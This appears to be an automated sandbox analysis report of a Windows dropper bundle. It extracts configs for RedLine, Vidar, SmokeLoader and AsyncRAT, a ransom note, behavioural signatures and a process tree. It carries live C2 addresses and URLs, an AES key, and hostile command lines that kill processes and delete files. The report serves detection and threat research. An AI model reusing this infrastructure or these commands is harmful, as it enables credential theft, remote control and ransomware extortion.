Resubmissions

03-07-2021 16:35

210703-cwatrnq5as 10

03-07-2021 16:30

210703-q8f21sleh2 10

Analysis

  • max time kernel
    297s
  • max time network
    301s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-07-2021 16:35

General

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-fhnNOAYC8Z Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0313ewgfDdSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk
URLs

https://we.tl/t-fhnNOAYC8Z

Extracted

Family

redline

Botnet

Cana

C2

176.111.174.254:56328

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

asyncrat

Version

0.5.7B

C2

null:null

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    3htbU7p8VLsbVqyiXfg3CvefpcBeyVlh

  • anti_detection

    true

  • autorun

    true

  • bdos

    false

  • delay

    Default

  • host

    null

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    https://pastebin.com/raw/xV7ZAURy

  • port

    null

  • version

    0.5.7B

aes.plain

Extracted

Family

vidar

Version

39.4

Botnet

933

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    933

Extracted

Family

vidar

Version

39.4

Botnet

865

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    865

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Async RAT payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 43 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 27 IoCs
  • Drops file in Program Files directory 51 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 17 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 12 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 55 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1084
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1196
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1356
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1892
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1288
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:932
              • C:\Users\Admin\AppData\Local\5e2c3a09-3e31-41e1-b563-39d0633120b8\71A0.exe
                C:\Users\Admin\AppData\Local\5e2c3a09-3e31-41e1-b563-39d0633120b8\71A0.exe --Task
                2⤵
                • Suspicious use of SetThreadContext
                PID:4116
                • C:\Users\Admin\AppData\Local\5e2c3a09-3e31-41e1-b563-39d0633120b8\71A0.exe
                  C:\Users\Admin\AppData\Local\5e2c3a09-3e31-41e1-b563-39d0633120b8\71A0.exe --Task
                  3⤵
                    PID:5984
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                1⤵
                  PID:68
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                  1⤵
                    PID:2752
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                    1⤵
                      PID:2384
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2360
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                      1⤵
                        PID:2332
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                        1⤵
                          PID:2272
                        • C:\Users\Admin\AppData\Local\Temp\main_setup_x86x64.exe
                          "C:\Users\Admin\AppData\Local\Temp\main_setup_x86x64.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3560
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:896
                            • C:\Users\Admin\AppData\Local\Temp\7zS08303804\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS08303804\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:1568
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_1.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3168
                                • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_1.exe
                                  sotema_1.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  PID:2464
                                  • C:\Windows\SysWOW64\rUNdlL32.eXe
                                    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
                                    6⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4432
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_2.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1300
                                • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_2.exe
                                  sotema_2.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3264
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_3.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3948
                                • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_3.exe
                                  sotema_3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2456
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 904
                                    6⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:6012
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_4.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2144
                                • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_4.exe
                                  sotema_4.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2452
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4464
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4172
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_5.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2084
                                • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_5.exe
                                  sotema_5.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:492
                                  • C:\Users\Admin\AppData\Local\Temp\is-KD1NP.tmp\sotema_5.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-KD1NP.tmp\sotema_5.tmp" /SL5="$5002E,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_5.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:2128
                                    • C:\Users\Admin\AppData\Local\Temp\is-6RDKJ.tmp\JFHGSFGSIUGFSUIG.exe
                                      "C:\Users\Admin\AppData\Local\Temp\is-6RDKJ.tmp\JFHGSFGSIUGFSUIG.exe" /S /UID=burnerch2
                                      7⤵
                                      • Drops file in Drivers directory
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Drops file in Program Files directory
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4848
                                      • C:\Program Files\Microsoft Office 15\XJUJFEEIUW\ultramediaburner.exe
                                        "C:\Program Files\Microsoft Office 15\XJUJFEEIUW\ultramediaburner.exe" /VERYSILENT
                                        8⤵
                                        • Executes dropped EXE
                                        PID:3932
                                        • C:\Users\Admin\AppData\Local\Temp\is-LR9FP.tmp\ultramediaburner.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-LR9FP.tmp\ultramediaburner.tmp" /SL5="$302FA,281924,62464,C:\Program Files\Microsoft Office 15\XJUJFEEIUW\ultramediaburner.exe" /VERYSILENT
                                          9⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious use of FindShellTrayWindow
                                          PID:4420
                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                            10⤵
                                            • Executes dropped EXE
                                            PID:5508
                                      • C:\Users\Admin\AppData\Local\Temp\ce-1110d-bce-ef3b3-3f669c0d48dcb\Cyvecuxoly.exe
                                        "C:\Users\Admin\AppData\Local\Temp\ce-1110d-bce-ef3b3-3f669c0d48dcb\Cyvecuxoly.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:5256
                                      • C:\Users\Admin\AppData\Local\Temp\0b-46289-a42-dc1ac-3229d4390c9aa\Vitoxocaemu.exe
                                        "C:\Users\Admin\AppData\Local\Temp\0b-46289-a42-dc1ac-3229d4390c9aa\Vitoxocaemu.exe"
                                        8⤵
                                          PID:6172
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sotema_6.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3156
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_6.exe
                                    sotema_6.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4016
                                    • C:\Users\Admin\AppData\Roaming\5085338.exe
                                      "C:\Users\Admin\AppData\Roaming\5085338.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:4632
                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4388
                                    • C:\Users\Admin\AppData\Roaming\1683451.exe
                                      "C:\Users\Admin\AppData\Roaming\1683451.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4712
                                    • C:\Users\Admin\AppData\Roaming\3105150.exe
                                      "C:\Users\Admin\AppData\Roaming\3105150.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4600
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sotema_7.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3936
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_7.exe
                                    sotema_7.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:3104
                                    • C:\Users\Admin\Documents\MdOvq8I4vhXS89e6RuesgLBO.exe
                                      "C:\Users\Admin\Documents\MdOvq8I4vhXS89e6RuesgLBO.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:5040
                                      • C:\Users\Admin\Documents\MdOvq8I4vhXS89e6RuesgLBO.exe
                                        "C:\Users\Admin\Documents\MdOvq8I4vhXS89e6RuesgLBO.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:5368
                                    • C:\Users\Admin\Documents\Mw1zy_kD76YydyzdWSbMVkjs.exe
                                      "C:\Users\Admin\Documents\Mw1zy_kD76YydyzdWSbMVkjs.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5148
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                                        7⤵
                                        • Loads dropped DLL
                                        • Enumerates system info in registry
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5280
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff950884f50,0x7ff950884f60,0x7ff950884f70
                                          8⤵
                                            PID:5312
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2064 /prefetch:8
                                            8⤵
                                              PID:5620
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2044 /prefetch:8
                                              8⤵
                                                PID:5628
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1688 /prefetch:2
                                                8⤵
                                                  PID:5788
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
                                                  8⤵
                                                    PID:6416
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2996 /prefetch:1
                                                    8⤵
                                                      PID:6424
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                      8⤵
                                                        PID:6508
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
                                                        8⤵
                                                          PID:6548
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
                                                          8⤵
                                                            PID:6600
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,3400412698954384467,15402592768288593570,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
                                                            8⤵
                                                              PID:6592
                                                        • C:\Users\Admin\Documents\DEGchvh2UcXSFqWylrYW5hCU.exe
                                                          "C:\Users\Admin\Documents\DEGchvh2UcXSFqWylrYW5hCU.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:5132
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "DEGchvh2UcXSFqWylrYW5hCU.exe" /f & erase "C:\Users\Admin\Documents\DEGchvh2UcXSFqWylrYW5hCU.exe" & exit
                                                            7⤵
                                                              PID:6824
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im "DEGchvh2UcXSFqWylrYW5hCU.exe" /f
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:6960
                                                          • C:\Users\Admin\Documents\85fWbVfTRnggiemuPqKln5EM.exe
                                                            "C:\Users\Admin\Documents\85fWbVfTRnggiemuPqKln5EM.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Checks processor information in registry
                                                            PID:5208
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 85fWbVfTRnggiemuPqKln5EM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\85fWbVfTRnggiemuPqKln5EM.exe" & del C:\ProgramData\*.dll & exit
                                                              7⤵
                                                              • Blocklisted process makes network request
                                                              • Executes dropped EXE
                                                              • Drops file in Windows directory
                                                              PID:6172
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im 85fWbVfTRnggiemuPqKln5EM.exe /f
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:4788
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /t 6
                                                                8⤵
                                                                • Delays execution with timeout.exe
                                                                PID:6472
                                                          • C:\Users\Admin\Documents\0rOlkqKnu3gev3zgQOzuD16e.exe
                                                            "C:\Users\Admin\Documents\0rOlkqKnu3gev3zgQOzuD16e.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:5224
                                                            • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              PID:6140
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5500
                                                              • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                8⤵
                                                                  PID:4692
                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Checks whether UAC is enabled
                                                                • Drops file in Program Files directory
                                                                PID:5156
                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:1096
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:6792
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:2172
                                                              • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:6080
                                                            • C:\Users\Admin\Documents\AczV4MhVCcMmm4d3r5sHahKJ.exe
                                                              "C:\Users\Admin\Documents\AczV4MhVCcMmm4d3r5sHahKJ.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5472
                                                              • C:\Users\Admin\Documents\AczV4MhVCcMmm4d3r5sHahKJ.exe
                                                                C:\Users\Admin\Documents\AczV4MhVCcMmm4d3r5sHahKJ.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5640
                                                              • C:\Users\Admin\Documents\AczV4MhVCcMmm4d3r5sHahKJ.exe
                                                                C:\Users\Admin\Documents\AczV4MhVCcMmm4d3r5sHahKJ.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5748
                                                            • C:\Users\Admin\Documents\EgNn_gSFk2Vio5NDCB3MUTGy.exe
                                                              "C:\Users\Admin\Documents\EgNn_gSFk2Vio5NDCB3MUTGy.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:5488
                                                            • C:\Users\Admin\Documents\yiFErl0MK241Ky9NnuvwmESo.exe
                                                              "C:\Users\Admin\Documents\yiFErl0MK241Ky9NnuvwmESo.exe"
                                                              6⤵
                                                                PID:5500
                                                                • C:\Users\Admin\Documents\yiFErl0MK241Ky9NnuvwmESo.exe
                                                                  C:\Users\Admin\Documents\yiFErl0MK241Ky9NnuvwmESo.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5140
                                                              • C:\Users\Admin\Documents\ge2wqnma6BxsVWqr7_xn35YB.exe
                                                                "C:\Users\Admin\Documents\ge2wqnma6BxsVWqr7_xn35YB.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5688
                                                                • C:\Users\Admin\Documents\ge2wqnma6BxsVWqr7_xn35YB.exe
                                                                  C:\Users\Admin\Documents\ge2wqnma6BxsVWqr7_xn35YB.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks processor information in registry
                                                                  PID:5320
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im ge2wqnma6BxsVWqr7_xn35YB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ge2wqnma6BxsVWqr7_xn35YB.exe" & del C:\ProgramData\*.dll & exit
                                                                    8⤵
                                                                      PID:7148
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im ge2wqnma6BxsVWqr7_xn35YB.exe /f
                                                                        9⤵
                                                                        • Kills process with taskkill
                                                                        PID:4900
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /t 6
                                                                        9⤵
                                                                        • Delays execution with timeout.exe
